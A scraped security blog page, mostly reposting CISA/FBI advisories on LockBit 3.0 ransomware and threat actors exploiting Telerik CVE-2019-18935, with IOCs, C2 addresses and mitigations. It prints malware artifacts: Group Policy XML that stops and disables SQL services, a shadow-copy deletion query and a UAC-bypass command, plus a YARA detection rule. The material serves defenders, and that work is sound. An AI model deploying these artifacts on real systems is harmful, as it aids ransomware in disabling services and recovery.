Finally, you should monitor all activity on the admin API. This will allow you to detect any suspicious activity and take action quickly. You should also use logging to track all requests and responses to the admin API. This will allow you to review any suspicious activity and take action if necessary.
In conclusion, protecting your Apache APISIX admin access is essential for ensuring the security of your data. By following the steps outlined above, you can ensure that your data is safe and secure. With these measures in place, you can rest assured that your data is protected from unauthorized access and theft.
Paramètres des cookies et politique de confidentialité
Comment nous utilisons les cookies
Nous utilisons les cookies pour nous faire savoir quand vous visitez nos sites Web, comment vous interagissez avec nous, pour enrichir votre expérience utilisateur et pour personnaliser votre relation avec notre site Web.
Cliquez sur les différents titres de catégories pour en savoir plus. Vous pouvez également modifier certaines de vos préférences. Notez que le blocage de certains types de cookies peut avoir un impact sur votre expérience sur nos sites Web et les services que nous sommes en mesure d'offrir.
Cookies essentiels sur ce site
These cookies are strictly necessary to provide you with services available through our website and to use some of its features.
Because these cookies are strictly necessary to deliver the website, you cannot refuse them without impacting how our site functions. You can block or delete them by changing your browser settings and force blocking all cookies on this website.
Cookies Google Analytics
Ces cookies recueillent des renseignements qui sont utilisés sous forme agrégée pour nous aider à comprendre comment notre site Web est utilisé ou l'efficacité de nos campagnes de marketing, ou pour nous aider à personnaliser notre site Web et notre application pour vous afin d'améliorer votre expérience.
Si vous ne voulez pas que nous suivions votre visite sur notre site, vous pouvez désactiver le suivi dans votre navigateur ici :
Autres services
Nous utilisons également différents services externes comme Google Webfonts, Google Maps et les fournisseurs externes de vidéo. Comme ces fournisseurs peuvent collecter des données personnelles comme votre adresse IP, nous vous permettons de les bloquer ici. Veuillez noter que cela pourrait réduire considérablement la fonctionnalité et l'apparence de notre site. Les changements prendront effet une fois que vous aurez rechargé la page.
.
Paramètres de Google Webfont Settings :
Google Map :
Vimeo et Youtube :
Politique de confidentialité
Vous pouvez lire nos cookies et nos paramètres de confidentialité en détail sur la page suivante
#StopRansomware: LockBit 3.0
Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’informationSUMMARY
Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
Actions to take today to mitigate cyber threats from ransomware:
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known LockBit 3.0 ransomware IOCs and TTPs identified through FBI investigations as recently as March 2023.
The LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service (RaaS) model and is a continuation of previous versions of the ransomware, LockBit 2.0, and LockBit. Since January 2020, LockBit has functioned as an affiliate-based ransomware variant; affiliates deploying the LockBit RaaS use many varying TTPs and attack a wide range of businesses and critical infrastructure organizations, which can make effective computer network defense and mitigation challenging.
The FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Download the PDF version of this report:
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK for Enterprise.
CAPABILITIES
LockBit 3.0, also known as “LockBit Black,” is more modular and evasive than its previous versions and shares similarities with Blackmatter and Blackcat ransomware.
LockBit 3.0 is configured upon compilation with many different options that determine the behavior of the ransomware. Upon the actual execution of the ransomware within a victim environment, various arguments can be supplied to further modify the behavior of the ransomware. For example, LockBit 3.0 accepts additional arguments for specific operations in lateral movement and rebooting into Safe Mode (see LockBit Command Line parameters under Indicators of Compromise). If a LockBit affiliate does not have access to passwordless LockBit 3.0 ransomware, then a password argument is mandatory during the execution of the ransomware. LockBit 3.0 affiliates failing to enter the correct password will be unable to execute the ransomware [T1480.001]. The password is a cryptographic key which decodes the LockBit 3.0 executable. By protecting the code in such a manner, LockBit 3.0 hinders malware detection and analysis with the code being unexecutable and unreadable in its encrypted form. Signature-based detections may fail to detect the LockBit 3.0 executable as the executable’s encrypted potion will vary based on the cryptographic key used for encryption while also generating a unique hash. When provided the correct password, LockBit 3.0 will decrypt the main component, continue to decrypt or decompress its code, and execute the ransomware.
LockBit 3.0 will only infect machines that do not have language settings matching a defined exclusion list. However, whether a system language is checked at runtime is determined by a configuration flag originally set at compilation time. Languages on the exclusion list include, but are not limited to, Romanian (Moldova), Arabic (Syria), and Tatar (Russia). If a language from the exclusion list is detected [T1614.001], LockBit 3.0 will stop execution without infecting the system.
INITIAL ACCESS
Affiliates deploying LockBit 3.0 ransomware gain initial access to victim networks via remote desktop protocol (RDP) exploitation [T1133], drive-by compromise [T1189], phishing campaigns [T1566], abuse of valid accounts [T1078], and exploitation of public-facing applications [T1190].
EXECUTION AND INFECTION PROCESS
During the malware routine, if privileges are not sufficient, LockBit 3.0 attempts to escalate to the required privileges [TA0004]. LockBit 3.0 performs functions such as:
LockBit 3.0 attempts to spread across a victim network by using a preconfigured list of credentials hardcoded at compilation time or a compromised local account with elevated privileges [T1078]. When compiled, LockBit 3.0 may also enable options for spreading via Group Policy Objects and PsExec using the Server Message Block (SMB) protocol. LockBit 3.0 attempts to encrypt [T1486] data saved to any local or remote device, but skips files associated with core system functions.
After files are encrypted, LockBit 3.0 drops a ransom note with the new filename <Ransomware ID>.README.txt and changes the host’s wallpaper and icons to LockBit 3.0 branding [T1491.001]. If needed, LockBit 3.0 will send encrypted host and bot information to a command and control (C2) server [T1027].
Once completed, LockBit 3.0 may delete itself from the disk [T1070.004] as well as any Group Policy updates that were made, depending on which options were set at compilation time.
EXFILTRATION
LockBit 3.0 affiliates use Stealbit, a custom exfiltration tool used previously with LockBit 2.0 [TA0010]; rclone, an open-source command line cloud storage manager [T1567.002]; and publicly available file sharing services, such as MEGA [T1567.002], to exfiltrate sensitive company data files prior to encryption. While rclone and many publicly available file sharing services are primarily used for legitimate purposes, they can also be used by threat actors to aid in system compromise, network exploration, or data exfiltration. LockBit 3.0 affiliates often use other publicly available file sharing services to exfiltrate data as well [T1567] (see Table 1).
LEVERAGING FREEWARE AND OPEN-SOURCE TOOLS
LockBit affiliates have been observed using various freeware and open-source tools during their intrusions. These tools are used for a range of activities such as network reconnaissance, remote access and tunneling, credential dumping, and file exfiltration. Use of PowerShell and Batch scripts
are observed across most intrusions, which focus on system discovery, reconnaissance, password/credential hunting, and privilege escalation. Artifacts of professional penetration-testing tools such as Metasploit and Cobalt Strike have also been observed. See Table 2 for a list of legitimate freeware and open-source tools LockBit affiliates have repurposed for ransomware operations:
Indicators of Compromise (IOCs)
The IOCs and malware characteristics outlined below were derived from field analysis. The following samples are current as of March 2023.
LockBit 3.0 Black Icon
LockBit 3.0 Wallpaper
LockBit Command Line Parameters
Mutual Exclusion Object (Mutex) Created
When executed, LockBit 3.0 will create the mutex, Global<MD4 hash of machine GUID>,
and check to see if this mutex has already been created to avoid running more than one instance of the ransomware.
UAC Bypass via Elevated COM Interface
LockBit 3.0 is capable of bypassing User Account Control (UAC) to execute code with elevated privileges via elevated Component Object Model (COM) Interface. C:WindowsSystem32dllhost.exe is spawned with high integrity with the command line GUID 3E5FC7F9-9A51-4367-9063-A120244FBEC.
For example, %SYSTEM32%dllhost.exe/Processid:{3E5FC7F9-9A51-4367-9063- A120244FBEC7}.
Volume Shadow Copy Deletion
LockBit 3.0 uses Windows Management Instrumentation (WMI) to identify and delete Volume Shadow Copies. LockBit 3.0 uses select * from Win32_ShadowCopy to query for Volume Shadow copies, Win32_ShadowCopy.ID to obtain the ID of the shadow copy, and DeleteInstance to delete any shadow copies.
Registry Artifacts
LockBit 3.0 Icon
LockBit 3.0 Wallpaper
Disable Privacy Settings Experience
Enable Automatic Logon
Disable and Clear Windows Event Logs
Ransom Locations
Safe Mode Launch Commands
LockBit 3.0 has a Safe Mode feature to circumvent endpoint antivirus and detection. Depending upon the host operating system, the following command is launched to reboot the system to Safe Mode with Networking:
Group Policy Artifacts
The following are Group Policy Extensible Markup Language (XML) files identified after a LockBit 3.0 infection:
<NetworkShareSettings clsid=”{520870D8-A6E7-47e8-A8D8-E6A4E76EAEC2}”>
<NetShare clsid=”{2888C5E7-94FC-4739-90AA-2C1536D68BC0}”
image=”2″ name=”%%ComputerName%%_D” changed=”%s” uid=”%s”>
<Properties action=”U” name=”%%ComputerName%%_D” path=”D:” comment=”” allRegular=”0″ allHidden=”0″ allAdminDrive=”0″ limitUsers=”NO_CHANGE” abe=”NO_CHANGE”/>
Services.xml stops and disables services on the Active Directory (AD) hosts.
<NTServices clsid=”{2CFB484A-4E96-4b5d-A0B6-093D2F91E6AE}”>
<NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}”
name=”SQLPBDMS” image=”4″ changed=”%s” uid=”%s” disabled=”0″>
<Properties startupType=”DISABLED” serviceName=”SQLPBDMS” serviceAction=”STOP” timeout=”30″/>
</NTService>
<NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}”
name=”SQLPBENGINE” image=”4″ changed=”%s” uid=”%s” disabled=”0″>
<Properties startupType=”DISABLED” serviceName=”SQLPBENGINE” serviceAction=”STOP” timeout=”30″/>
</NTService>
<NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}”
name=”MSSQLFDLauncher” image=”4″ changed=”%s” uid=”%s” userContext=”0″ removePolicy=”0″ disabled=”0″>
<Properties startupType=”DISABLED” serviceName=”MSSQLFDLauncher” serviceAction=”STOP” timeout=”30″/>
</NTService>
<NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}”
name=”SQLSERVERAGENT” image=”4″ changed=”%s” uid=”%s” disabled=”0″>
<Properties startupType=”DISABLED” serviceName=”SQLSERVERAGENT” serviceAction=”STOP” timeout=”30″/>
</NTService>
<NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}”
name=”MSSQLServerOLAPService” image=”4″ changed=”%s” uid=”%s” disabled=”0″>
<Properties startupType=”DISABLED” serviceName=”MSSQLServerOLAPService” serviceAction=”STOP” timeout=”30″/>
</NTService>
<NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}”
name=”SSASTELEMETRY” image=”4″ changed=”%s” uid=”%s” disabled=”0″>
<Properties startupType=”DISABLED” serviceName=”SSASTELEMETRY” serviceAction=”STOP” timeout=”30″/>
</NTService>
<NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}”
name=”SQLBrowser” image=”4″ changed=”%s” uid=”%s” disabled=”0″>
<Properties startupType=”DISABLED” serviceName=”SQLBrowser” serviceAction=”STOP” timeout=”30″/>
</NTService>
<NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}”
name=”SQL Server Distributed Replay Client” image=”4″ changed=”%s” uid=”%s” disabled=”0″>
<Properties startupType=”DISABLED” serviceName=”SQL Server Distributed Replay Client” serviceAction=”STOP” timeout=”30″/>
</NTService>
<NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}”
name=”SQL Server Distributed Replay Controller” image=”4″ changed=”%s” uid=”%s” disabled=”0″>
<Properties startupType=”DISABLED” serviceName=”SQL Server Distributed Replay Controller” serviceAction=”STOP” timeout=”30″/>
</NTService>
<NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}”
name=”MsDtsServer150″ image=”4″ changed=”%s” uid=”%s” disabled=”0″>
<Properties startupType=”DISABLED” serviceName=”MsDtsServer150″ serviceAction=”STOP” timeout=”30″/>
</NTService>
<NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}”
name=”SSISTELEMETRY150″ image=”4″ changed=”%s” uid=”%s” disabled=”0″>
<Properties startupType=”DISABLED” serviceName=”SSISTELEMETRY150″ serviceAction=”STOP” timeout=”30″/>
</NTService>
<NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}”
name=”SSISScaleOutMaster150″ image=”4″ changed=”%s” uid=”%s” disabled=”0″>
<Properties startupType=”DISABLED” serviceName=”SSISScaleOutMaster150″ serviceAction=”STOP” timeout=”30″/>
</NTService>
<NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}”
name=”SSISScaleOutWorker150″ image=”4″ changed=”%s” uid=”%s” disabled=”0″>
<Properties startupType=”DISABLED” serviceName=”SSISScaleOutWorker150″ serviceAction=”STOP” timeout=”30″/>
</NTService>
<NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}”
name=”MSSQLLaunchpad” image=”4″ changed=”%s” uid=”%s” disabled=”0″>
<Properties startupType=”DISABLED” serviceName=”MSSQLLaunchpad” serviceAction=”STOP” timeout=”30″/>
</NTService>
<NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}”
name=”SQLWriter” image=”4″ changed=”%s” uid=”%s” disabled=”0″>
<Properties startupType=”DISABLED” serviceName=”SQLWriter” serviceAction=”STOP” timeout=”30″/>
</NTService>
<NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}”
name=”SQLTELEMETRY” image=”4″ changed=”%s” uid=”%s” disabled=”0″>
<Properties startupType=”DISABLED” serviceName=”SQLTELEMETRY” serviceAction=”STOP” timeout=”30″/>
</NTService>
<NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}”
name=”MSSQLSERVER” image=”4″ changed=”%s” uid=”%s” disabled=”0″>
<Properties startupType=”DISABLED” serviceName=”MSSQLSERVER” serviceAction=”STOP” timeout=”60″/>
</NTService>
</NTServices>
Registry.pol
The following registry configuration changes values for the Group Policy refresh time, disable SmartScreen, and disable Windows Defender.
Force GPUpdate
Once new group policies are added, a PowerShell command using Group Policy update (GPUpdate) applies the new group policy changes to all computers on the AD domain.
Services Killed
Processes Killed
LockBit 3.0 Ransom Note
Network Connections
If configured, Lockbit 3.0 will send two HTTP POST requests to one of the C2servers. Information about the victim host and bot are encrypted with an Advanced Encryption Standard (AES) key and encoded in Base64.
User Agent Strings
6.1)
(KHTML, like Gecko)
MITRE ATT&CK TECHNIQUES
See Table 3 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping to the MITRE ATT&CK framework, see CISA’s Decider Tool and Best Practices for MITRE ATT&CK Mapping Guide.
MITIGATIONS
The FBI, CISA, and the MS-ISAC recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of LockBit 3.0’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, the FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and the MS-ISAC authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
The FBI, CISA, and the MS-ISAC recommend continually testing your security program at scale and in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESOURCES
REPORTING
The FBI is seeking any information that can be legally shared, including:
The FBI, CISA, and MS-ISAC do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at report@cisa.gov. State, local, tribal, and territorial (SLTT) government entities can also report to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and the MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, or the MS-ISAC.
Source de l’article sur us-cert.gov
Threat Actors Exploit Progress Telerik Vulnerability in U.S. Government IIS Server
Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’informationSUMMARY
From November 2022 through early January 2023, the Cybersecurity and Infrastructure Security Agency (CISA) and authoring organizations identified the presence of indicators of compromise (IOCs) at a federal civilian executive branch (FCEB) agency. Analysts determined that multiple cyber threat actors, including an APT actor, were able to exploit a .NET deserialization vulnerability (CVE-2019-18935) in Progress Telerik user interface (UI) for ASP.NET AJAX, located in the agency’s Microsoft Internet Information Services (IIS) web server. Successful exploitation of this vulnerability allows for remote code execution. According to Progress Software, Telerik UI for ASP.NET AJAX builds before R1 2020 (2020.1.114) are vulnerable to this exploit.[1]
Actions to take today to mitigate malicious cyber activity:
CISA, the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) to provide IT infrastructure defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.
Download the PDF version of this report:
For a downloadable copy of IOCs, see
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding detection and mitigation recommendations.
Overview
CISA and authoring organizations assess that, beginning as late as November 2022, threat actors successfully exploited a .NET deserialization vulnerability (CVE-2019-18935) in an instance of Telerik UI for ASP.NET AJAX Q2 2013 SP1 (version 2013.2.717) running on an FCEB agency’s Microsoft IIS server. This exploit, which results in interactive access with the web server, enabled the threat actors to successfully execute remote code on the vulnerable web server. Though the agency’s vulnerability scanner had the appropriate plugin for CVE-2019-18935, it failed to detect the vulnerability due to the Telerik UI software being installed in a file path it does not typically scan. This may be the case for many software installations, as file paths widely vary depending on the organization and installation method.
In addition to CVE-2019-18935, this version (2013.2.717) of Telerik UI for ASP.NET AJAX contains the following known vulnerabilities: CVE-2017-11357, CVE-2017-11317, and CVE-2017-9248. Analysis suggests that cyber threat actors exploited CVE-2019-18935 in conjunction with either CVE-2017-11357 or CVE-2017-11317. Australian Cyber Security Centre (ACSC) Advisory 2020-004 assesses that exploitation of CVE-2019-18935 is only possible with knowledge of Telerik RadAsyncUpload encryption keys.[2] Threat actors can obtain these keys through either prior knowledge or exploitation of vulnerabilities—CVE-2017-11357 or CVE-2017-11317—present in older, unpatched versions of Telerik released between 2007 and 2017. Forensic evidence is not available to definitively confirm exploitation of either CVE-2017-11357 or CVE-2017-11317.
Threat Actor Activity
CISA and authoring organizations observed multiple cyber threat actors, including an APT actor—hereafter referred to as Threat Actor 1 (TA1)—and known cybercriminal actor XE Group—hereafter referred to as Threat Actor 2 (TA2)—conducting reconnaissance and scanning activities [T1595.002] that correlate to the successful exploitation of CVE-2019-18935 in the agency’s IIS server running Telerik UI for ASP.NET AJAX [T1190].
When exploiting the vulnerability, the threat actors uploaded malicious dynamic-link library (DLL) files (some masqueraded as portable network graphics [PNG] files) [T1105] to the
C:WindowsTemp
directory. The malicious files were then executed from theC:WindowsTemp
directory via thew3wp.exe
process—a legitimate process that runs on IIS servers. This process is routine for handling requests sent to web servers and delivering content. The review of antivirus logs identified that some DLL files were created [T1055.001] and detected as early as August 2021.CISA and authoring organizations confirmed that some malicious files dropped on the IIS server are consistent with a previously reported file naming convention that threat actors commonly use when exploiting CVE-2019-18935.[3] The threat actors name the files in the Unix Epoch time format and use the date and time as recorded on the target system. The file naming convention follows the pattern
[10 digits].[7 digits].dll
(e.g., a file created on October 31, 2022, could be1667203023.5321205.dll
).The names of some of the PNG files were misleading. For example, file
1596835329.5015914.png
, which decodes to August 7, 2020, 21:22:09 UTC, first appeared on October 13, 2022, but the file system shows a creation date of August 7, 2020. The uncorrelated Unix Epoch time format may indicate that the threat actors used the timestomping [T1070.006] technique. This file naming convention is a primary IOC used by the threat actors.In many cases, malicious artifacts were not available for analysis because the threat actors’ malware—that looks for and removes files with the .dll file extension—removed files [T1070.004] from the
C:WindowsTemp
directory. Through full packet data capture analysis and reverse engineering of malicious DLL files, no indications of additional malicious activity or sub-processes were found executed by thew3wp.exe
process. CISA observed error messages being sent to the threat actors’ command and control (C2) server when permission restraints prevented the service account from executing the malicious DLLs and writing new files.Network activity analysis was consistent with the artifacts provided for review. Analysts did not observe evidence of privilege escalation or lateral movement.
Threat Actor 1
CISA and authoring organizations observed TA1 exploiting CVE-2019-18935 for system enumeration beginning in August 2022. The vulnerability allows a threat actor to upload malicious DLLs on a target system and execute them by abusing a legitimate process, e.g., the
w3wp.exe
process. In this instance, TA1 was able to upload malicious DLL files to the C:WindowsTemp directory and then achieve remote code execution, executing the DLL files via the w3wp.exe process.At least nine DLL files used for discovery [TA0007], C2 [TA0011], and defense evasion [TA0005]. All of the analyzed samples have network parameters, including host name, domain name, Domain Name System (DNS) server Internet Protocol (IP) address and machine name, Network Basic Input/Output System (NetBIOS) ID, adapter information, IP address, subnet, gateway IP, and Dynamic Host Configuration Protocol (DHCP) server [T1016]. All analyzed samples communicate this collected data to a C2 server at IP address 1
37.184.130[.]162
or45.77.212[.]12
. The C2 traffic to these IP addresses uses a non-application layer protocol [T1095] by leveraging Transmission Control Protocol (TCP) clear text (i.e., unencrypted) over port 443. Analysis also identified that:.dll
extension in theC:WindowsTemp
directory on the server. TA1 may use this capability to hide additional malicious activity on the network.CISA, in coordination with the authoring organizations, identified and observed the following threat actor IPs and timestamps associated with this activity:
IP Address
First Identified
Last Identified
137.184.130[.]162
09/26/2022
10/08/2022
45.77.212[.]12
10/07/2022
11/25/2022
104.225.129[.]102
10/10/2022
11/16/2022
149.28.85[.]24
10/12/2022
10/17/2022
185.186.245[.]72
10/18/2022
10/18/2022
193.8.172[.]113
09/25/2022
09/25/2022
193.8.172[.]13
09/25/2022
10/17/2022
216.120.201[.]12
10/13/2022
11/10/2022
5.34.178[.]246
09/25/2022
09/25/2022
79.133.124[.]242
09/25/2022
09/25/2022
92.38.169[.]193
09/27/2022
10/08/2022
92.38.176[.]109
09/12/2022
09/25/2022
92.38.176[.]130
09/25/2022
10/07/2022
Threat Actor 2
TA2—identified as likely the cybercriminal actor XE Group—often includes
xe[word]
nomenclature in original filenames and registered domains. Volexity lists this naming convention and other observed TTPs as common for this threat actor group.[4]As early as August 2021, CISA and authoring organizations observed TA2 delivering malicious PNG files that, following analysis, were masqueraded DLL files to avoid detection [T1036.005]. Similar to TA1, TA2 exploited CVE-2019-18935 and was able to upload at least three unique DLL files into the
C:WindowsTemp
directory that TA2 executed via thew3wp.exe
process. These DLL files drop and execute reverse (remote) shell utilities for unencrypted communication with C2 IP addresses associated with the malicious domains listed in Table 2. Note: At the time of analysis, the domains resolved to the listed IP addresses.IP Address
Resolving Domains
184.168.104[.]171
xework[.]com
xegroups[.]com
hivnd[.]com
144.96.103[.]245
xework[.]com
Analysis of DLL files determined the files listed in Table 3 were dropped, decoded, and attempted to connect to the respective malicious domains. Embedded payloads dropped by the DLL files were observed using the command line utility
certutil[.]exe
and writing new files asxesvrs[.]exe
to invoke reverse shell utilities execution.Filename
Description
XEReverseShell.exe
DLL files (masqueraded as PNG files) located in the
C:WindowsTemp
directory contain a base64 encoded file with the internal nameXEReverseShell.exe
, which was dropped into the same directory assortcombat.exe
.When executed, the reverse shell utility attempts to connect to
xework[.]com
orxegroups[.]com
to obtain the IP address of the C2 server and port number for unencrypted communication.Note: It is likely the threat actors changed the file extension from .dll to .png to avoid detection.
Multi-OS_ReverseShell.exe
Reverse shell utility decoded from the base64 encoded file
xesmartshell.tmp
.When executed, it will attempt to connect to
xegroups[.]com
orxework[.]com
to obtain the IP address of the C2 server and port number for unencrypted communication.SortVistaCompat
Base64 encoded payload dropped from
Multi-OS_ReverseShell.exe
. This file receives the C2 IP and port fromxework[.]com
.When the TA2 malware is executed a DLL file drops an executable (
XEReverseShell.exe
) that attempts to pull a C2 IP address and port number fromxework[.]com
orxegroups[.]com
.If communication is established between the TA2 malware and the C2:
xesetshell
, causing the malware to connect to the server and download a file called small.txt—a base64-encoded webshell that the malware decodes and places in theC:WindowsTemp
directory.xequit
, causing the malware to sleep for a period of time determined by the threat actors.The two files
xesmartshell.tmp
andSortVistaCompat
have the capability to drop an Active Server Pages (ASPX) webshell—a base64 encoded text filesmall.txt
decoded [T1140] assmall.aspx
[T1505.003]—to enumerate drives; to send, receive, and delete files; and to execute incoming commands. The webshell contains an interface for easily browsing files, directories, or drives on the system, and allows the user to upload or download files to any directory. No webshells were observed to be dropped on the target system, likely due to the abused service account having restrictive write permissions.For more information on the DLLs, binaries, and webshell, see CISA MAR-10413062-1.v1 Telerik Vulnerability in U.S. Government IIS Server.
MITRE ATT&CK TACTICS AND TECHNIQUES
See Table 4 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping to the MITRE ATT&CK framework, see CISA’s Decider Tool and Best Practices for MITRE ATT&CK Mapping Guide.
Reconnaissance
Technique Title
ID
Use
Active Scanning: Vulnerability Scanning
T1595.002
Actors were observed conducting active scanning activity for vulnerable devices and specific ports.
Initial Access
Technique Title
ID
Use
Exploit Public-Facing Application
T1190
Actors exploited a known vulnerability in the Microsoft IIS server.
Persistence
Technique Title
ID
Use
Server Software Component: Web Shell
T1505.003
TA2’s malware dropped an ASPX webshell to enumerate drives; send, receive, and delete files; and execute commands.
Defense Evasion
Technique Title
ID
Use
Masquerading: Match Legitimate Name or Location
T1036.005
Actors leveraged the legitimate
w3wp.exe
process on the IIS server to write malicious DLL files and evade detection.Process Injection: DLL Injection
T1055.001
Actors loaded newly created DLLs into a running
w3wp.exe
process.Indicator Removal: File Deletion
T1070.004
TA1’s malware deleted files with “.dll” from the
C:WindowsTemp
directory, which may indicate hidden malicious activity on the network.Indicator Removal: Timestomp
T1070.006
Actors modified file time attributes to insert misleading creation dates.
Decode Files
T1140
The base64 encoded text file
small.txt
decoded as the webshellsmall.aspx
.Discovery
Technique Title
ID
Use
File and Directory Discovery
T1083
Actors enumerated the IIS server via OS fingerprinting, executed Windows processes, and collected network information.
TA1’s malware enumerates systems, processes, files, and directories.
System Network Configuration Discovery
T1016
TA1’s malware gathers network parameters, including host name, domain name, DNS servers, NetBIOS ID, adapter information, IP address, subnet, gateway IP, and DHCP server.
Command and Control
Technique Title
ID
Use
Ingress Tool Transfer
T1105
TA1 and TA2 uploaded malicious DLL files (some masqueraded as PNG files) to the
C:WindowsTemp
directory.Non-Application Layer Protocol
T1095
Actors used a non-application layer protocol (TCP) for
w3wp.exe
process exploitation, C2, and enumeration on the IIS server.DETECTION METHODS
CISA and authoring organizations recommend that organizations review the steps listed in this section and Table 4: Identified ATT&CK Techniques for Enterprise to detect similar activity on IIS servers.
Yara Rule
CISA developed the following YARA rule from the base proof-of-concept code for CVE-2019-18935.[5] Note: Authoring organizations do not guarantee all malicious DLL files (if identified) will use the same code provided in this YARA rule.
rule CISA_10424018_01 {
meta:
Author = "CISA Code & Media Analysis"
Incident = "10424018"
Date = "2023-02-07"
Last_Modified = "20230216_1500"
Actor = "n/a"
Family = "n/a"
Capabilities = "n/a"
Malware_Type = "n/a"
Tool_Type = "n/a"
Description = "Detects open-source exploit samples"
SHA256 = "n/a"
strings:
$s0 = { 3D 20 7B 20 22 63 6D 22 2C 20 22 64 2E 65 22 2C }
$s1 = { 20 22 78 22 2C 20 22 65 22 20 7D 3B }
$s2 = { 52 65 76 65 72 73 65 53 68 65 6C 6C 28 29 }
$s3 = { 54 65 6C 65 72 69 6B 20 55 49 }
$s4 = { 66 69 6C 65 6E 61 6D 65 5F 6C 6F 63 61 6C }
$s5 = { 66 69 6C 65 6E 61 6D 65 5F 72 65 6D 6F 74 65 }
$s6 = { 41 55 43 69 70 68 65 72 2E 65 6E 63 72 79 70 74 }
$s7 = { 31 32 31 66 61 65 37 38 31 36 35 62 61 33 64 34 }
$s8 = { 43 6F 6E 6E 65 63 74 53 74 61 67 69 6E 67 53 65 72 76 65 72 28 29 }
$s9 = { 53 74 61 67 69 6E 67 53 65 72 76 65 72 53 6F 63 6B 65 74 }
$s10 = { 2A 62 75 66 66 65 72 20 3D 20 28 75 6E 73 69 67 6E 65 }
$s11 = { 28 2A 29 28 29 29 62 75 66 66 65 72 3B 0A 20 20 20 20 66 75 6E 63 28 29 3B }
$s12 = { 75 70 6C 6F 61 64 28 70 61 79 6C 6F 61 64 28 54 65 6D 70 54 61 72 67 65 74 }
$s13 = { 36 32 36 31 36 66 33 37 37 35 36 66 32 66 }
condition:
($s0 and $s1 and $s2) or ($s3 and $s4 and $s5 and $s6 and $s7) or ($s8 and $s9 and $s10 and $s11) or ($s12 and $s13)
}
Log Collection, Retention, and Analysis
CISA, FBI, and MS-ISAC recommend that organizations utilize a centralized log collection and monitoring capability, as well as implement or increase logging and forensic data retention. Longer retention policies improve the availability of data for forensic analysis and aid thorough identification of incident scope.
Creation of Malicious DLLs
CISA, FBI, and MS-ISAC recommend that organizations use process monitoring—which provides visibility into file system and application process activity—to detect suspicious executable files running from the
C:WindowsTemp
directory. Process monitoring via Windows Event Code 4688 will detect the legitimatew3wp.exe
process running suspicious DLL files and other anomalous child processes. Note: Enabling this event may inundate security event logging. Use centralized log collection to prevent log rollover, increase log retention and archiving, and/or enable command line event logging.Forensic analysis commonly identified the threat actors taking the following steps:
C:WindowsTemp1665890187.8690152.dll
) by processw3wp.exe
PID 6484.w3wp.exe
PID 6484.w3wp.exe
PID 6484 to45.77.212[.]12
over port 443.C:WindowsSystem32vcruntime140.dll
